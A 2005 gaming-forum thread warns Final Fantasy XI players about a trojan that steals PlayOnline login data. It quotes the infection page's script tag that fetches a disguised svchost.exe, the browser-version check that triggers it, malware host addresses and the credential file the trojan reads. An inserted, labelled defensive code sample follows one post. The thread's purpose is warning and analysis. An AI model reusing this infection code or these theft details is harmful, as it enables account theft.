
Trojan warning. 50 Japanese accounts stolen.

#1 Oct 24 2005 at 5:55 AM Rating: Good
**
963 posts
Please note that I can't read Japanese myself and the info was passed to me from a friend living in Japan. He said this is big news on the 2ch forums right now and 50 accounts have been confirmed to be stolen as of October 22nd. Since I can not read Japanese nor am I a computer expert, I can not confirm this information. So I want to pass on this information collected by my friend for everyone to see. Please use your own judgement whether to believe it or not.

Here are the related threads from 2ch.
http://live19.2ch.net/test/read.cgi/ogame/1129895797/
http://archives.mmorpgplayer.com/nmz/data/live19.2ch.net/ogame/dat/1129895797.html
http://live19.2ch.net/test/read.cgi/ogame/1130087252/
http://news19.2ch.net/test/read.cgi/news/1130073619/

This trojan/spyware will run itself upon entering certain websites which I list below. This spyware will call for an HTML Help file "icyfox.chm" and download svhost.exe, running on top of Windows' process of the same name.

This spyware is NOT detectable by
Norton AntiVirus 2005
Norton Internet Security 2005
Virus Buster

The following are confirmed to be able to detect it.
AntiVir Win32:Mhtplo-31 > http://ringonoki.net/tool/antiv/antivir.html
Avast! TR/Copiet.B.1 > http://www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html

These are some sites that are found to be spreading this trojan. DO NOT TRY TO ENTER THEM. I replaced all dots with slashes.

www-japan213-com = www-1102213-com = 211-100-26-182 It is a Chinese IP
www-1102213-com/ff11help/money.htm

www-1102213-com/ff11help/svchost.exe
www-japan213-com/ff11929/ff11.asp

telnet www-1102213-com 80
Trying 211-100-26-182...
Connected to www-1102213-com.
Escape character is '^]'.
GET HTTP://www-1102213-com/ff11help/money.htm/ HTTP/1.0

HTTP/1.1 200 OK
...
<HTML><HEAD><TITLE>INDEX</TITLE></HEAD><BODY>
<SCRIPT LANGUAGE="Script" src="http://www-1102213-com/ff11help/svchost.exe"></SCRIPT>
<SCRIPT language=JavaScript>function sopen()...

They believe it will read POL login information from C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\usr\all\login_w.bin
and store it in C:\gameff11.txt


Edited, Mon Oct 24 07:11:01 2005 by Jazalas

Edited, Thu Nov 10 10:29:58 2005 by Darkflame
#2 Oct 24 2005 at 6:05 AM Rating: Decent
***
2,405 posts
Having a look through some of those images, it appears that they're not bluffing either.

Chinese IPs? Trojan viruses?

Possible connection?
#3 Oct 24 2005 at 6:18 AM Rating: Decent
Wow...

That's staggering. Can't this be reported to some kind of law authority?

And do SE know about it?
#4 Oct 24 2005 at 6:34 AM Rating: Decent
Another fantastic reason to make sure you have a firewall or two, much less a virus scanner.
#5 Oct 24 2005 at 6:50 AM Rating: Decent
***
2,914 posts
Meh, people who do this are sad..
Especially Chinese IPs? They can't farm gil efficiently anymore, so they hack. There HAS to be some legality issue in that, even for China.

#6 Oct 24 2005 at 6:55 AM Rating: Decent
***
2,405 posts
Remember, trojan viruses are often related to DDoS attacks.
#7 Oct 24 2005 at 7:01 AM Rating: Decent
***
1,182 posts
Common sense is a great defense against trojans, virii and by virtue account theft.

Personally, unless it comes directly from ffxi.archbell.com, I will not download anything to my local drives that relates to FFXI in any way, shape or form. Even then, I'm always skeptical and make great efforts to do my research before doing that.

Guaranteed the people that fall for this **** are just poor uneducated saps that are looking for the latest bot/hack/what-have-you, and can't resist the urge to follow any link that might theoretically satisfy their desire for some advantage or another.
#8 Oct 24 2005 at 7:52 AM Rating: Decent
****
4,148 posts
o_O

the passwords aren't encrypted?
#9 Oct 24 2005 at 8:04 AM Rating: Decent
Sometimes I'm glad I play on PS2. Any info on it affecting (or essentially robbing) SE's servers themselves? Or touching PS2 accounts like mine?
#10 Oct 24 2005 at 8:13 AM Rating: Decent
Scholar
*****
12,820 posts
Since PS2 users think they're invincible to this stuff, anything can happen, but so far, from what's being said on some boards, it's not affecting PS2 users as of yet, but it's up to your own stupidity (give out your POL ID, your password is EASY to figure out)

#11 Oct 24 2005 at 8:25 AM Rating: Decent
You don't have to give out your POL ID, it is plainly visible in the reconnect window on the screen during the sht maintenance (retry/repeat cycle).

I guess all it takes is 1 screen grab and that's your POL ID gone.

Spectator
#12 Oct 24 2005 at 8:35 AM Rating: Good
***
1,173 posts
to the OP:

I'm still looking through the website for AntiVir (the first website that you listed as able to locate this trojan). I haven't found any information regarding my question yet, so I thought I'd see if someone had already found this out.

I'm running McAfee VirusScan already. Is AntiVir able to co-exist with it, or, like most antivirus systems, will they end up seeing each other as problems?
#13 Oct 24 2005 at 8:44 AM Rating: Decent
*
90 posts
If you have a good password, then someone having your POL ID shouldn't be any big deal... I always spend a bit of time on passwords to make sure they aren't easy to guess... sure, if you spend long enough you can figure it out... but the same goes for... a cure to cancer... if someone gets my password, well, they deff worked for it.

As to the virus, yeah, deff just be careful what websites you go to. It's kinda sad that I use my desktop for important things and then use my laptop if I do any browsing at questionable sites... This eliminates the problem of possibly contaminating my desktop, and I can just re-format my laptop.
#14 Oct 24 2005 at 8:45 AM Rating: Decent
**
803 posts
Who says the two progs you posted are clean and some way to get passwords and such by tricking people in a neat scary story about accounts being stolen?
#15 Oct 24 2005 at 9:13 AM Rating: Decent
*
60 posts
AntiVir: http://www.free-av.com/ or http://www.download.com/AntiVir-Personal-Edition/3000-2239_4-10322934.html?tag=lst-0-1
#16 Oct 24 2005 at 9:19 AM Rating: Good
***
1,387 posts
I don't trust this at all. Normally when a new trojan comes out, it isn't long before the anti-virus companies share the information and they all update. The idea that two esoteric virus programs can get it and none of the recognizable names can is suspect to me. Personally, I'm just forwarding the information to my virus company and asking them if they know anything about it. I don't get scared into installing programs.
#17 Oct 24 2005 at 9:21 AM Rating: Decent
Well, there is a good possibility that these trojans contain keyloggers which record every key press made. So even having a good password won't help, as it will just record it down anyhow.
#18 Oct 24 2005 at 9:38 AM Rating: Good
***
1,099 posts
Just had a little looksie, did a quick telnet to my cgi server, wget the htm, vim the results; it's really rather simple.

The download uses a very old exploit that uses the help files thing; any anti-virus programme worth its salt will detect the download process from the page.

How does it work? Bear with me, this is from memory. It uses an exploit in MS Help, that allows MS Help to open and run a command box (cmd.exe) and using command runs scripts that are downloaded.

Should you worry? Not really; go to http://windowsupdate.microsoft.com. This vuln was patched a long time ago, as you can tell by the code itself: if it finds a patched browser, it times out:

if(ie.indexOf("MSIE 5.0")==-1 && 
ie.indexOf("NT 5.2")==-1&& 
!(ie.indexOf("NT 5.1")!=-1&&navigator.appMinorVersion.indexOf("SP2")!=-1) 
){setTimeout('sopen();',0);}else{


So, breaking it down (rusty): the entire thing is run as one line, && sees to that, == means equals, != means not equal. So if IE = 5.0 and NT = 5.2 but not 5.1 and SP2, or something, then time out, else hit the script.

I actually do remember this one: it downloads the file onto your computer, then gets Windows to run the file via Help. I read about it a long time ago on a grey hat site, fascinating stuff, but IE is very much patched against it.
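The browser check quoted in this post, as an added example that is not code from the post or from the malicious page: it re-implements the gate as a pure function so a defender can tell, from recorded User-Agent strings, which visitors' browsers the script would have gone on to attack. The log format, the host addresses and the ";SP2;" value of navigator.appMinorVersion are constructed assumptions.

```javascript
// Added example, not code from the thread or from the malicious page: the
// browser gate quoted in post #18 rewritten as a side-effect-free function.
// Where the original page goes on to call sopen() (its downloader), this
// simply returns true, so the targeting logic can be studied offline.
function gateWouldFire(userAgent, appMinorVersion) {
  // navigator.appMinorVersion exists only in IE; the original would throw a
  // TypeError in a non-IE browser on NT 5.1. Default to "" to keep it total.
  const minor = appMinorVersion == null ? "" : String(appMinorVersion);
  return userAgent.indexOf("MSIE 5.0") === -1 &&
         userAgent.indexOf("NT 5.2") === -1 &&      // Windows Server 2003
         !(userAgent.indexOf("NT 5.1") !== -1 &&     // Windows XP ...
           minor.indexOf("SP2") !== -1);             // ... with SP2 applied
}

// Constructed sample "proxy log" lines: host|User-Agent|appMinorVersion.
// Assumptions: 2005-era IE User-Agent strings, and ";SP2;" as the value
// IE 6 on XP SP2 reports in navigator.appMinorVersion.
const SAMPLE_LOG = [
  "10.0.0.11|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)|;SP1;",
  "10.0.0.12|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)|;SP2;",
  "10.0.0.13|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)|;SP1;",
  "10.0.0.14|Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0)|",
  "10.0.0.15|Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)|;SP4;",
];

// Returns the hosts whose browser the gate lets through: the machines an
// incident responder should look at first after a visit to the page.
function hostsToTriage(lines) {
  return lines
    .map((line) => line.split("|"))
    .filter(([, ua, minor]) => gateWouldFire(ua, minor))
    .map(([host]) => host);
}

console.log(hostsToTriage(SAMPLE_LOG)); // [ '10.0.0.11', '10.0.0.15' ]
```

Note that the gate only looks for substrings, so a non-IE browser on XP passes it even though the Help exploit itself is IE-specific.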
#19 Oct 24 2005 at 10:53 AM Rating: Decent
*
90 posts
the good password thing was in reply to just getting the pol id.

Quote:
give out your POL ID, your password is EASY to figure out)


so just make a difficult password and someone knowing your pol id means nothing...
#20 Oct 24 2005 at 3:10 PM Rating: Decent
**
963 posts
FYI, I have very little knowledge when it comes to viruses/hacks/security. I purchased EZantivirus and that's the only protection I have until today. I can't comment on the trojan, but looking at the screenshots on 2ch they don't seem fake.

If you have experience/knowledge about trojan/worms/virus/security feel free to point out possibilities and whatnot. I would like to know more about it as well.
#21 Oct 24 2005 at 3:26 PM Rating: Decent
Quote:
Chinese IPs? Trojan viruses?

Possible connection?


Yes, it's an elaborate hoax to attempt to educate Japanese Youths in the use of Condoms.
#22 Oct 24 2005 at 3:50 PM Rating: Decent
****
4,864 posts
Professor Quinsisdos wrote:


Chinese IPs? Trojan viruses?

Possible connection?


Communist Chinese, cheating?? You dare say! *gasp*


#23 Oct 24 2005 at 4:16 PM Rating: Decent
***
1,970 posts
I think I'm safe; while I play on PC, I don't browse the internet from the same computer I play FFXI on. In fact, all that particular PC is used for is FFXI.
#24 Oct 24 2005 at 6:33 PM Rating: Decent
Scholar
*****
12,820 posts
grvydude wrote:
the good password thing was in reply to just getting the pol id.

Quote:
give out your POL ID, your password is EASY to figure out)


so just make a difficult password and someone knowing your pol id means nothing...


IF someone figures out your password, it's useless without knowing the ID. Remember, there are MANY MANY ways to figure out a password; also, if it's someone that knows you, that makes it easier for them to figure it out :P Trust me.. as an ex-hacker, it's pretty easy to find out people's passwords.

Anyway, connection? Maybe.. still.. it does suck that this happened, but it proves that the JP accounts stolen in question were probably major botters/cheaters. Either way, I hate things like this that happen; that's why I refuse to download anything created by someone for FFXI. Especially, like now, the "FFXI messenger" thing that a known hacker of Kujata is making, that's just pretty much...yeah. Either way, this all sucks in general :(

#25 Oct 24 2005 at 7:09 PM Rating: Excellent
Your POL ID and password are stored in memory in plain text while you are logged in to POL, regardless of whether you have the "Save Password" option selected.

Unfortunately, if you have this trojan, it really doesn't matter how secure your password is.
#26 Oct 24 2005 at 11:00 PM Rating: Good
*
158 posts
Hello everyone,

I can advise people on one set of antivirus software that will detect these and other viruses that Norton and McAfee drop the ball on. It's AVG. You can get a free download of it at www.grisoft.com . You will have even stronger protection if you buy the full version and run it with ICS minimally. I have all my PCs in my house networked and protected with nothing getting through. (Also gets rid of that pesky Krepper.C virus, which is useless but annoying nonetheless.)

Hopefully this helps.

Sincerely
Korde